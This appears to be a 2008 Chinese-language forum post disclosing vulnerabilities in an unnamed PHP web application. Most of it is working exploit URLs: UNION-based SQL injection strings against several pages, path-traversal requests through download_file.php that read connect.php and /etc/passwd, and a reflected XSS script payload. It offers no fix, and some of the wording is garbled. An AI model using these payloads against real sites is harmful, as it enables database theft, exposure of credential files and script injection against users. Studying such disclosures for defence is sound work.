|
|
登陆前进入add_postit.php , delete.php , prest_detail.php , mod_prest_date.php网页不会
验证,一个简单的用户可以轻松地获得敏感信息从数据库注射
| SQL查询。
|在“ download_file.php ”页面通过输入“ fichierwe ”.任何用户都可以下载任何地方的文件。
|此外,在“ add_prest_date.php ”页面有XSS 。
条件:一个普通帐户而已
| 1. SQL 注入:
| [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8#
| [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns])
| [Site]prest_detail.php?prev=[SQL-INJ]
| [Site]mod_prest_date.php?prev=list&id=[SQL-INJ]
2.本地文件下载 : `
| [Site]download_file.php?fichier=../include/connect.php
| [Site]download_file.php?fichier=../../../../../../etc/passwd
3. XSS :
| [Site]add_prest_date.php?date=\"><script>alert(tinzon好帅)</script> |
|
发表于 2008-10-31 16:38:26